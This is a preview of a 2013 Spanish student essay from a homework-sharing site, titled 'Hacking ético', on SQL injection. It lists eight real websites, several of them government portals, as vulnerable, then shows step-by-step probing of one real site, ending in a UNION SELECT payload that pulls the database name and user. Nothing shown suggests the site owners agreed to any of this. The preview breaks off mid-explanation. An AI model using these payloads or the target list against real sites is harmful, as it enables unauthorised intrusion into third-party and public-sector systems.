hacking

Páginas: 2 (436 palabras) Publicado: 11 de octubre de 2013
Chennier Murillo H.
Hacking ético

SQL INJECTION

7 paginas vulnerables para SQL Injection

1. http://www.fernando9torres.com/index.php?s=noticias&idcat=7
2.http://www.luisvizcaya.com/productos.php?idCat=15
3. http://www.aspanaex.org/index.php?cat=1&id=77&estado=3&item=927
4. http://www.hospitalsanjosedemariquita.gov.co/portal/website/publicaciones/noticias/download.php?id=6
5.http://www.secretariadeambiente.gov.co/aulavirtual/index.php?action=artikel&cat=3&id=4&artlang=es
6. http://www.sedtolima.gov.co/portal2/portal/website/servicios/tramites/download_not.php?id=904
7.http://www.isp.gov.ve/salud/index.php?id=nclpgpoe
http://www.cdneza.gob.mx/index.php?id=galerias&cve=51

Se escoge una y se verifica si realmente es vulnerable para SQL Injetctionhttp://www.fernando9torres.com/index.php?s=noticias&idcat=7
Se agrega un carácter después del id, en este caso el * y verificamos.
http://www.fernando9torres.com/index.php?s=noticias&idcat=7*
Lo primero para hacer esaveriguar el número de columnas que tiene la tabla para poder hacer consultas, en este caso se usara después de id= 1+order+by, así:

Para ello continuamos modificando la dirección URL hastahttp://www.fernando9torres.com/index.php?s=noticias&idcat=1
http://www.fernando9torres.com/index.php?s=noticias&idcat=2
http://www.fernando9torres.com/index.php?s=noticias&idcat=3

En algún puntodespués de modificar la tabla se debe encontrar un error, allí se sabe cuál es el valor más alto, que es donde se muestra correctamente.
En este caso al llegar a:http://www.fernando9torres.com/index.php?s=noticias&idcat=3
Se vuelve notorio el error.

Se realiza una consulta

http://www.fernando9torres.com/index.php?s=noticias&idcat=-1+union+select+1,2,database(),user(),connection_id()Unión: Se usa para combinar los resultados de varias sentencias SELECT. 

Select: Nos permite consultar los datos almacenados en una tabla de la base de datos. 

versión(): Devuelve la versión del...
Leer documento completo

Regístrate para leer el documento completo.

Estos documentos también te pueden resultar útiles

  • hacking
  • hacking
  • El Hacking
  • hacking
  • Hacking
  • HAcking
  • Hacking
  • Hacking

Conviértase en miembro formal de Buenas Tareas

INSCRÍBETE - ES GRATIS